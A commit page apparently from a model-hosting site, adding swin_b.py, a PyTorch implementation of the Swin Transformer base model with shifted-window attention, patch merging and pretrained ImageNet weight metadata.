Chinese
MurmanskY commited on
Commit
1e18d9b
1 Parent(s): 62644d2

Upload swin_b.py

Browse files
Files changed (1) hide show
  1. swin_b.py +690 -0
swin_b.py ADDED
@@ -0,0 +1,690 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import math
2
+ from functools import partial
3
+ from typing import Any, Callable, List, Optional
4
+
5
+ import torch
6
+ import torch.nn.functional as F
7
+ from torch import nn, Tensor
8
+ from triton.language import tensor
9
+
10
+ from ..ops.misc import MLP, Permute
11
+ from ..ops.stochastic_depth import StochasticDepth
12
+ from ..transforms._presets import ImageClassification, InterpolationMode
13
+ from ..utils import _log_api_usage_once
14
+ from ._api import register_model, Weights, WeightsEnum
15
+ from ._meta import _IMAGENET_CATEGORIES
16
+ from ._utils import _ovewrite_named_param, handle_legacy_interface
17
+
18
+
19
# Public API of this module. Only names that are actually defined in this file are
# listed: exporting a missing name makes ``from <module> import *`` raise AttributeError.
__all__ = [
    "SwinTransformer",
    "Swin_B_Weights",
    "swin_b",
]
34
+
35
+
36
+ def _patch_merging_pad(x: torch.Tensor) -> torch.Tensor:
37
+ H, W, _ = x.shape[-3:]
38
+ x = F.pad(x, (0, 0, 0, W % 2, 0, H % 2))
39
+ x0 = x[..., 0::2, 0::2, :] # ... H/2 W/2 C
40
+ x1 = x[..., 1::2, 0::2, :] # ... H/2 W/2 C
41
+ x2 = x[..., 0::2, 1::2, :] # ... H/2 W/2 C
42
+ x3 = x[..., 1::2, 1::2, :] # ... H/2 W/2 C
43
+ x = torch.cat([x0, x1, x2, x3], -1) # ... H/2 W/2 4*C
44
+ return x
45
+
46
+
47
+ torch.fx.wrap("_patch_merging_pad")
48
+
49
+
50
+ def _get_relative_position_bias(
51
+ relative_position_bias_table: torch.Tensor, relative_position_index: torch.Tensor, window_size: List[int]
52
+ ) -> torch.Tensor:
53
+ N = window_size[0] * window_size[1]
54
+ relative_position_bias = relative_position_bias_table[relative_position_index] # type: ignore[index]
55
+ relative_position_bias = relative_position_bias.view(N, N, -1)
56
+ relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous().unsqueeze(0)
57
+ return relative_position_bias
58
+
59
+
60
+ torch.fx.wrap("_get_relative_position_bias")
61
+
62
+
63
class PatchMerging(nn.Module):
    """Patch merging (downsampling) layer.

    Concatenates each 2x2 group of neighbouring patches, normalizes the
    resulting ``4 * dim`` features and projects them to ``2 * dim``.

    Args:
        dim (int): Number of input channels.
        norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
    """

    def __init__(self, dim: int, norm_layer: Callable[..., nn.Module] = nn.LayerNorm):
        super().__init__()
        _log_api_usage_once(self)
        merged_dim = 4 * dim
        self.dim = dim
        # Submodules are registered in the same order as before (reduction, then norm).
        self.reduction = nn.Linear(merged_dim, 2 * dim, bias=False)
        self.norm = norm_layer(merged_dim)

    def forward(self, x: Tensor):
        """
        Args:
            x (Tensor): input tensor with expected layout of [..., H, W, C]
        Returns:
            Tensor with layout of [..., H/2, W/2, 2*C]
        """
        merged = _patch_merging_pad(x)  # ... H/2 W/2 4*C
        normalized = self.norm(merged)
        return self.reduction(normalized)  # ... H/2 W/2 2*C
88
+
89
+
90
class PatchMergingV2(nn.Module):
    """Patch merging (downsampling) layer for Swin Transformer V2.

    Same as :class:`PatchMerging` except that the normalization is applied
    after the linear reduction, on ``2 * dim`` features.

    Args:
        dim (int): Number of input channels.
        norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
    """

    def __init__(self, dim: int, norm_layer: Callable[..., nn.Module] = nn.LayerNorm):
        super().__init__()
        _log_api_usage_once(self)
        reduced_dim = 2 * dim
        self.dim = dim
        self.reduction = nn.Linear(4 * dim, reduced_dim, bias=False)
        self.norm = norm_layer(reduced_dim)  # V2 normalizes the reduced features

    def forward(self, x: Tensor):
        """
        Args:
            x (Tensor): input tensor with expected layout of [..., H, W, C]
        Returns:
            Tensor with layout of [..., H/2, W/2, 2*C]
        """
        merged = _patch_merging_pad(x)  # ... H/2 W/2 4*C
        reduced = self.reduction(merged)  # ... H/2 W/2 2*C
        return self.norm(reduced)
115
+
116
+
117
def shifted_window_attention(
    input: Tensor,
    qkv_weight: Tensor,
    proj_weight: Tensor,
    relative_position_bias: Tensor,
    window_size: List[int],
    num_heads: int,
    shift_size: List[int],
    attention_dropout: float = 0.0,
    dropout: float = 0.0,
    qkv_bias: Optional[Tensor] = None,
    proj_bias: Optional[Tensor] = None,
    logit_scale: Optional[torch.Tensor] = None,
    training: bool = True,
) -> Tensor:
    """
    Window based multi-head self attention (W-MSA) with relative position bias.
    It supports both shifted and non-shifted windows.

    The input is padded to a multiple of the window size, optionally rolled by
    ``shift_size``, split into windows, attended per window, and then the
    windowing, roll and padding are undone in reverse order.

    Args:
        input (Tensor[N, H, W, C]): The input tensor of 4 dimensions.
        qkv_weight (Tensor[in_dim, out_dim]): The weight tensor of query, key, value.
        proj_weight (Tensor[out_dim, out_dim]): The weight tensor of projection.
        relative_position_bias (Tensor): The learned relative position bias added to attention.
        window_size (List[int]): Window size.
        num_heads (int): Number of attention heads.
        shift_size (List[int]): Shift size for shifted window attention. The list is not modified.
        attention_dropout (float): Dropout ratio of attention weight. Default: 0.0.
        dropout (float): Dropout ratio of output. Default: 0.0.
        qkv_bias (Tensor[out_dim], optional): The bias tensor of query, key, value. Default: None.
        proj_bias (Tensor[out_dim], optional): The bias tensor of projection. Default: None.
        logit_scale (Tensor[out_dim], optional): Logit scale of cosine attention for Swin Transformer V2.
            When given, cosine attention is used instead of scaled dot-product attention. Default: None.
        training (bool, optional): Training flag used by the dropout parameters. Default: True.
    Returns:
        Tensor[N, H, W, C]: The output tensor after shifted window attention.
    """
    B, H, W, C = input.shape
    # pad feature maps to multiples of window size (padding is added at the bottom/right only)
    pad_r = (window_size[1] - W % window_size[1]) % window_size[1]
    pad_b = (window_size[0] - H % window_size[0]) % window_size[0]
    x = F.pad(input, (0, 0, 0, pad_r, 0, pad_b))
    _, pad_H, pad_W, _ = x.shape

    # work on a copy so that the caller's shift_size list is not mutated below
    shift_size = shift_size.copy()
    # If window size is larger than feature size, there is no need to shift window
    if window_size[0] >= pad_H:
        shift_size[0] = 0
    if window_size[1] >= pad_W:
        shift_size[1] = 0

    # cyclic shift
    if sum(shift_size) > 0:
        x = torch.roll(x, shifts=(-shift_size[0], -shift_size[1]), dims=(1, 2))

    # partition windows
    num_windows = (pad_H // window_size[0]) * (pad_W // window_size[1])
    x = x.view(B, pad_H // window_size[0], window_size[0], pad_W // window_size[1], window_size[1], C)
    x = x.permute(0, 1, 3, 2, 4, 5).reshape(B * num_windows, window_size[0] * window_size[1], C)  # B*nW, Ws*Ws, C

    # multi-head attention
    if logit_scale is not None and qkv_bias is not None:
        # cosine attention path: zero the middle third of the bias, i.e. the part that feeds `k`
        # (clone first so the parameter passed in is left untouched)
        qkv_bias = qkv_bias.clone()
        length = qkv_bias.numel() // 3
        qkv_bias[length : 2 * length].zero_()
    qkv = F.linear(x, qkv_weight, qkv_bias)
    # split the projection into q/k/v and heads: 3, B*nW, num_heads, Ws*Ws, C/num_heads
    qkv = qkv.reshape(x.size(0), x.size(1), 3, num_heads, C // num_heads).permute(2, 0, 3, 1, 4)
    q, k, v = qkv[0], qkv[1], qkv[2]
    if logit_scale is not None:
        # cosine attention: similarity of L2-normalized q and k, scaled by exp(logit_scale)
        # where logit_scale is clamped to at most log(100)
        attn = F.normalize(q, dim=-1) @ F.normalize(k, dim=-1).transpose(-2, -1)
        logit_scale = torch.clamp(logit_scale, max=math.log(100.0)).exp()
        attn = attn * logit_scale
    else:
        # scaled dot-product attention with scale (C / num_heads) ** -0.5
        q = q * (C // num_heads) ** -0.5
        attn = q.matmul(k.transpose(-2, -1))
    # add relative position bias
    attn = attn + relative_position_bias

    if sum(shift_size) > 0:
        # generate attention mask: label each region of the padded map with an id ...
        attn_mask = x.new_zeros((pad_H, pad_W))
        h_slices = ((0, -window_size[0]), (-window_size[0], -shift_size[0]), (-shift_size[0], None))
        w_slices = ((0, -window_size[1]), (-window_size[1], -shift_size[1]), (-shift_size[1], None))
        count = 0
        for h in h_slices:
            for w in w_slices:
                attn_mask[h[0] : h[1], w[0] : w[1]] = count
                count += 1
        # ... partition the ids into windows the same way as the features ...
        attn_mask = attn_mask.view(pad_H // window_size[0], window_size[0], pad_W // window_size[1], window_size[1])
        attn_mask = attn_mask.permute(0, 2, 1, 3).reshape(num_windows, window_size[0] * window_size[1])
        # ... and give every token pair with different ids a bias of -100 (0 otherwise)
        attn_mask = attn_mask.unsqueeze(1) - attn_mask.unsqueeze(2)
        attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0))
        # expose the window axis so the per-window mask broadcasts over batch and heads
        attn = attn.view(x.size(0) // num_windows, num_windows, num_heads, x.size(1), x.size(1))
        attn = attn + attn_mask.unsqueeze(1).unsqueeze(0)
        attn = attn.view(-1, num_heads, x.size(1), x.size(1))

    attn = F.softmax(attn, dim=-1)
    attn = F.dropout(attn, p=attention_dropout, training=training)

    # weighted sum of values, heads merged back into the channel axis, then output projection
    x = attn.matmul(v).transpose(1, 2).reshape(x.size(0), x.size(1), C)
    x = F.linear(x, proj_weight, proj_bias)
    x = F.dropout(x, p=dropout, training=training)

    # reverse windows
    x = x.view(B, pad_H // window_size[0], pad_W // window_size[1], window_size[0], window_size[1], C)
    x = x.permute(0, 1, 3, 2, 4, 5).reshape(B, pad_H, pad_W, C)

    # reverse cyclic shift
    if sum(shift_size) > 0:
        x = torch.roll(x, shifts=(shift_size[0], shift_size[1]), dims=(1, 2))

    # unpad features
    x = x[:, :H, :W, :].contiguous()
    return x
230
+
231
+
232
+ torch.fx.wrap("shifted_window_attention")
233
+
234
+
235
class ShiftedWindowAttention(nn.Module):
    """
    Module holding the parameters for :func:`shifted_window_attention`:
    the qkv and output projections, a relative position bias table and the
    index buffer used to read that table.
    """

    def __init__(
        self,
        dim: int,
        window_size: List[int],
        shift_size: List[int],
        num_heads: int,
        qkv_bias: bool = True,
        proj_bias: bool = True,
        attention_dropout: float = 0.0,
        dropout: float = 0.0,
    ):
        super().__init__()
        if not (len(window_size) == 2 and len(shift_size) == 2):
            raise ValueError("window_size and shift_size must be of length 2")

        self.window_size = window_size
        self.shift_size = shift_size
        self.num_heads = num_heads
        self.attention_dropout = attention_dropout
        self.dropout = dropout

        self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
        self.proj = nn.Linear(dim, dim, bias=proj_bias)

        # Both hooks can be overridden by subclasses.
        self.define_relative_position_bias_table()
        self.define_relative_position_index()

    def define_relative_position_bias_table(self):
        """Create the learnable bias table with one row per relative offset and one column per head."""
        num_offsets = (2 * self.window_size[0] - 1) * (2 * self.window_size[1] - 1)
        table = torch.zeros(num_offsets, self.num_heads)  # 2*Wh-1 * 2*Ww-1, nH
        self.relative_position_bias_table = nn.Parameter(table)
        nn.init.trunc_normal_(self.relative_position_bias_table, std=0.02)

    def define_relative_position_index(self):
        """Register the flat table index of every (token, token) pair inside a window."""
        win_h, win_w = self.window_size[0], self.window_size[1]
        grid = torch.stack(torch.meshgrid(torch.arange(win_h), torch.arange(win_w), indexing="ij"))  # 2, Wh, Ww
        flat = torch.flatten(grid, 1)  # 2, Wh*Ww
        offsets = (flat[:, :, None] - flat[:, None, :]).permute(1, 2, 0).contiguous()  # Wh*Ww, Wh*Ww, 2
        # Shift both offsets so they start from 0, then linearize (row-major over the offset grid).
        row_part = (offsets[:, :, 0] + (win_h - 1)) * (2 * win_w - 1)
        col_part = offsets[:, :, 1] + (win_w - 1)
        index = (row_part + col_part).flatten()  # Wh*Ww*Wh*Ww
        self.register_buffer("relative_position_index", index)

    def get_relative_position_bias(self) -> torch.Tensor:
        """Return the bias read from the table through the registered index buffer."""
        bias = _get_relative_position_bias(
            self.relative_position_bias_table, self.relative_position_index, self.window_size  # type: ignore[arg-type]
        )
        return bias

    def forward(self, x: Tensor) -> Tensor:
        """
        Args:
            x (Tensor): Tensor with layout of [B, H, W, C]
        Returns:
            Tensor with same layout as input, i.e. [B, H, W, C]
        """
        bias = self.get_relative_position_bias()
        out = shifted_window_attention(
            x,
            self.qkv.weight,
            self.proj.weight,
            bias,
            self.window_size,
            self.num_heads,
            shift_size=self.shift_size,
            attention_dropout=self.attention_dropout,
            dropout=self.dropout,
            qkv_bias=self.qkv.bias,
            proj_bias=self.proj.bias,
            training=self.training,
        )
        return out
314
+
315
+
316
class ShiftedWindowAttentionV2(ShiftedWindowAttention):
    """
    Swin Transformer V2 variant of :class:`ShiftedWindowAttention`.

    It calls :func:`shifted_window_attention` with a learnable ``logit_scale``
    and produces the relative position bias with a small MLP applied to a
    fixed table of log-spaced relative coordinates.
    """

    def __init__(
        self,
        dim: int,
        window_size: List[int],
        shift_size: List[int],
        num_heads: int,
        qkv_bias: bool = True,
        proj_bias: bool = True,
        attention_dropout: float = 0.0,
        dropout: float = 0.0,
    ):
        super().__init__(
            dim,
            window_size,
            shift_size,
            num_heads,
            qkv_bias=qkv_bias,
            proj_bias=proj_bias,
            attention_dropout=attention_dropout,
            dropout=dropout,
        )

        # One scale per head, initialised to log(10).
        self.logit_scale = nn.Parameter(torch.log(10 * torch.ones((num_heads, 1, 1))))
        # mlp to generate continuous relative position bias
        self.cpb_mlp = nn.Sequential(
            nn.Linear(2, 512, bias=True),
            nn.ReLU(inplace=True),
            nn.Linear(512, num_heads, bias=False),
        )
        if qkv_bias:
            # Zero the middle third of the qkv bias.
            third = self.qkv.bias.numel() // 3
            self.qkv.bias[third : 2 * third].data.zero_()

    def define_relative_position_bias_table(self):
        """Register the fixed table of normalized, log-spaced relative coordinates."""
        win_h, win_w = self.window_size[0], self.window_size[1]
        offsets_h = torch.arange(-(win_h - 1), win_h, dtype=torch.float32)
        offsets_w = torch.arange(-(win_w - 1), win_w, dtype=torch.float32)
        grid = torch.stack(torch.meshgrid([offsets_h, offsets_w], indexing="ij"))
        table = grid.permute(1, 2, 0).contiguous().unsqueeze(0)  # 1, 2*Wh-1, 2*Ww-1, 2

        table[:, :, :, 0] /= win_h - 1
        table[:, :, :, 1] /= win_w - 1

        table *= 8  # normalize to -8, 8
        table = torch.sign(table) * torch.log2(torch.abs(table) + 1.0) / 3.0
        self.register_buffer("relative_coords_table", table)

    def get_relative_position_bias(self) -> torch.Tensor:
        """Return ``16 * sigmoid`` of the MLP-generated bias, gathered per token pair."""
        generated_table = self.cpb_mlp(self.relative_coords_table).view(-1, self.num_heads)
        bias = _get_relative_position_bias(
            generated_table,
            self.relative_position_index,  # type: ignore[arg-type]
            self.window_size,
        )
        return 16 * torch.sigmoid(bias)

    def forward(self, x: Tensor):
        """
        Args:
            x (Tensor): Tensor with layout of [B, H, W, C]
        Returns:
            Tensor with same layout as input, i.e. [B, H, W, C]
        """
        bias = self.get_relative_position_bias()
        out = shifted_window_attention(
            x,
            self.qkv.weight,
            self.proj.weight,
            bias,
            self.window_size,
            self.num_heads,
            shift_size=self.shift_size,
            attention_dropout=self.attention_dropout,
            dropout=self.dropout,
            qkv_bias=self.qkv.bias,
            proj_bias=self.proj.bias,
            logit_scale=self.logit_scale,
            training=self.training,
        )
        return out
400
+
401
+
402
class SwinTransformerBlock(nn.Module):
    """
    Swin Transformer Block: a pre-norm attention branch followed by a pre-norm
    MLP branch, each added to the input through stochastic depth.

    Args:
        dim (int): Number of input channels.
        num_heads (int): Number of attention heads.
        window_size (List[int]): Window size.
        shift_size (List[int]): Shift size for shifted window attention.
        mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4.0.
        dropout (float): Dropout rate. Default: 0.0.
        attention_dropout (float): Attention dropout rate. Default: 0.0.
        stochastic_depth_prob: (float): Stochastic depth rate. Default: 0.0.
        norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm.
        attn_layer (nn.Module): Attention layer. Default: ShiftedWindowAttention
    """

    def __init__(
        self,
        dim: int,
        num_heads: int,
        window_size: List[int],
        shift_size: List[int],
        mlp_ratio: float = 4.0,
        dropout: float = 0.0,
        attention_dropout: float = 0.0,
        stochastic_depth_prob: float = 0.0,
        norm_layer: Callable[..., nn.Module] = nn.LayerNorm,
        attn_layer: Callable[..., nn.Module] = ShiftedWindowAttention,
    ):
        super().__init__()
        _log_api_usage_once(self)

        hidden_dim = int(dim * mlp_ratio)

        self.norm1 = norm_layer(dim)
        self.attn = attn_layer(
            dim,
            window_size,
            shift_size,
            num_heads,
            attention_dropout=attention_dropout,
            dropout=dropout,
        )
        self.stochastic_depth = StochasticDepth(stochastic_depth_prob, "row")
        self.norm2 = norm_layer(dim)
        self.mlp = MLP(dim, [hidden_dim, dim], activation_layer=nn.GELU, inplace=None, dropout=dropout)

        # Re-initialise every linear layer of the MLP.
        mlp_linears = [layer for layer in self.mlp.modules() if isinstance(layer, nn.Linear)]
        for linear in mlp_linears:
            nn.init.xavier_uniform_(linear.weight)
            if linear.bias is not None:
                nn.init.normal_(linear.bias, std=1e-6)

    def forward(self, x: Tensor):
        attn_branch = self.attn(self.norm1(x))
        x = x + self.stochastic_depth(attn_branch)
        mlp_branch = self.mlp(self.norm2(x))
        return x + self.stochastic_depth(mlp_branch)
457
+
458
+
459
class SwinTransformer(nn.Module):
    """
    Implements Swin Transformer from the `"Swin Transformer: Hierarchical Vision Transformer using
    Shifted Windows" <https://arxiv.org/pdf/2103.14030>`_ paper.

    The model is a patch-embedding stem followed by one stage per entry of ``depths``;
    every stage except the last is followed by a downsample layer that doubles the
    channel count. A final norm, global average pool and linear head produce the logits.

    Args:
        patch_size (List[int]): Patch size.
        embed_dim (int): Patch embedding dimension.
        depths (List(int)): Depth of each Swin Transformer layer.
        num_heads (List(int)): Number of attention heads in different layers.
        window_size (List[int]): Window size.
        mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4.0.
        dropout (float): Dropout rate. Default: 0.0.
        attention_dropout (float): Attention dropout rate. Default: 0.0.
        stochastic_depth_prob (float): Stochastic depth rate of the last block; earlier blocks
            get a linearly smaller rate, starting from 0 for the first block. Default: 0.1.
        num_classes (int): Number of classes for classification head. Default: 1000.
        block (nn.Module, optional): SwinTransformer Block. Default: None.
        norm_layer (nn.Module, optional): Normalization layer. Default: None.
        downsample_layer (nn.Module): Downsample layer (patch merging). Default: PatchMerging.
    """

    def __init__(
        self,
        patch_size: List[int],
        embed_dim: int,
        depths: List[int],
        num_heads: List[int],
        window_size: List[int],
        mlp_ratio: float = 4.0,
        dropout: float = 0.0,
        attention_dropout: float = 0.0,
        stochastic_depth_prob: float = 0.1,
        num_classes: int = 1000,
        norm_layer: Optional[Callable[..., nn.Module]] = None,
        block: Optional[Callable[..., nn.Module]] = None,
        downsample_layer: Callable[..., nn.Module] = PatchMerging,
    ):
        super().__init__()
        _log_api_usage_once(self)
        self.num_classes = num_classes

        if block is None:
            block = SwinTransformerBlock
        if norm_layer is None:
            norm_layer = partial(nn.LayerNorm, eps=1e-5)

        layers: List[nn.Module] = []
        # split image into non-overlapping patches
        layers.append(
            nn.Sequential(
                nn.Conv2d(
                    3, embed_dim, kernel_size=(patch_size[0], patch_size[1]), stride=(patch_size[0], patch_size[1])
                ),
                Permute([0, 2, 3, 1]),
                norm_layer(embed_dim),
            )
        )

        total_stage_blocks = sum(depths)
        # A model with a single block has nothing to interpolate over; using a denominator of at
        # least 1 avoids a ZeroDivisionError and gives that block a stochastic depth rate of 0.
        sd_denominator = max(total_stage_blocks - 1, 1)
        stage_block_id = 0
        # build SwinTransformer blocks
        for i_stage in range(len(depths)):
            stage: List[nn.Module] = []
            dim = embed_dim * 2**i_stage
            for i_layer in range(depths[i_stage]):
                # adjust stochastic depth probability based on the depth of the stage block
                sd_prob = stochastic_depth_prob * float(stage_block_id) / sd_denominator
                stage.append(
                    block(
                        dim,
                        num_heads[i_stage],
                        window_size=window_size,
                        # even layers use regular windows, odd layers use windows shifted by half a window
                        shift_size=[0 if i_layer % 2 == 0 else w // 2 for w in window_size],
                        mlp_ratio=mlp_ratio,
                        dropout=dropout,
                        attention_dropout=attention_dropout,
                        stochastic_depth_prob=sd_prob,
                        norm_layer=norm_layer,
                    )
                )
                stage_block_id += 1
            layers.append(nn.Sequential(*stage))
            # add patch merging layer
            if i_stage < (len(depths) - 1):
                layers.append(downsample_layer(dim, norm_layer))
        self.features = nn.Sequential(*layers)

        num_features = embed_dim * 2 ** (len(depths) - 1)
        self.norm = norm_layer(num_features)
        self.permute = Permute([0, 3, 1, 2])  # B H W C -> B C H W
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.flatten = nn.Flatten(1)
        self.head = nn.Linear(num_features, num_classes)

        for m in self.modules():
            if isinstance(m, nn.Linear):
                nn.init.trunc_normal_(m.weight, std=0.02)
                if m.bias is not None:
                    nn.init.zeros_(m.bias)

    def forward(self, x):
        """Compute the classification logits for a batch of images.

        The forward pass only computes and returns the logits: it does not print,
        touch the filesystem, or depend on a particular device being available.
        """
        x = self.features(x)
        x = self.norm(x)
        x = self.permute(x)
        x = self.avgpool(x)
        x = self.flatten(x)
        x = self.head(x)
        return x
593
+
594
+
595
def _swin_transformer(
    patch_size: List[int],
    embed_dim: int,
    depths: List[int],
    num_heads: List[int],
    window_size: List[int],
    stochastic_depth_prob: float,
    weights: Optional[WeightsEnum],
    progress: bool,
    **kwargs: Any,
) -> SwinTransformer:
    """Build a :class:`SwinTransformer` and, when ``weights`` is given, load its state dict.

    With weights, ``num_classes`` in ``kwargs`` is set from the number of categories
    in the weights metadata before the model is constructed.
    """
    use_pretrained = weights is not None

    if use_pretrained:
        num_categories = len(weights.meta["categories"])
        _ovewrite_named_param(kwargs, "num_classes", num_categories)

    model = SwinTransformer(
        patch_size=patch_size,
        embed_dim=embed_dim,
        depths=depths,
        num_heads=num_heads,
        window_size=window_size,
        stochastic_depth_prob=stochastic_depth_prob,
        **kwargs,
    )

    if use_pretrained:
        state_dict = weights.get_state_dict(progress=progress)
        model.load_state_dict(state_dict)

    return model
623
+
624
+
625
# Metadata entries merged into the ``meta`` dict of the weights defined in this file.
_COMMON_META = {
    "categories": _IMAGENET_CATEGORIES,
}
628
+
629
+
630
class Swin_B_Weights(WeightsEnum):
    # Weight entries selectable for the ``swin_b`` builder.
    IMAGENET1K_V1 = Weights(
        url="https://download.pytorch.org/models/swin_b-68c6b09e.pth",
        # Preset arguments passed to ImageClassification: crop size 224, resize size 238, bicubic interpolation.
        transforms=partial(
            ImageClassification, crop_size=224, resize_size=238, interpolation=InterpolationMode.BICUBIC
        ),
        meta={
            **_COMMON_META,
            "num_params": 87768224,
            "min_size": (224, 224),
            "recipe": "https://github.com/pytorch/vision/tree/main/references/classification#swintransformer",
            "_metrics": {
                "ImageNet-1K": {
                    "acc@1": 83.582,
                    "acc@5": 96.640,
                }
            },
            "_ops": 15.431,
            "_file_size": 335.364,
            "_docs": """These weights reproduce closely the results of the paper using a similar training recipe.""",
        },
    )
    # DEFAULT is an alias of IMAGENET1K_V1.
    DEFAULT = IMAGENET1K_V1
653
+
654
+
655
@register_model()
@handle_legacy_interface(weights=("pretrained", Swin_B_Weights.IMAGENET1K_V1))
def swin_b(*, weights: Optional[Swin_B_Weights] = None, progress: bool = True, **kwargs: Any) -> SwinTransformer:
    """
    Constructs a swin_base architecture from
    `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows <https://arxiv.org/pdf/2103.14030>`_.

    Args:
        weights (:class:`~torchvision.models.Swin_B_Weights`, optional): The
            pretrained weights to use. See
            :class:`~torchvision.models.Swin_B_Weights` below for
            more details, and possible values. By default, no pre-trained
            weights are used.
        progress (bool, optional): If True, displays a progress bar of the
            download to stderr. Default is True.
        **kwargs: parameters passed to the ``torchvision.models.swin_transformer.SwinTransformer``
            base class. Please refer to the `source code
            <https://github.com/pytorch/vision/blob/main/torchvision/models/swin_transformer.py>`_
            for more details about this class.

    .. autoclass:: torchvision.models.Swin_B_Weights
        :members:
    """
    verified_weights = Swin_B_Weights.verify(weights)

    # Base-size configuration: 4x4 patches, 128-dim embedding, four stages, 7x7 windows.
    model = _swin_transformer(
        patch_size=[4, 4],
        embed_dim=128,
        depths=[2, 2, 18, 2],
        num_heads=[4, 8, 16, 32],
        window_size=[7, 7],
        stochastic_depth_prob=0.5,
        weights=verified_weights,
        progress=progress,
        **kwargs,
    )
    return model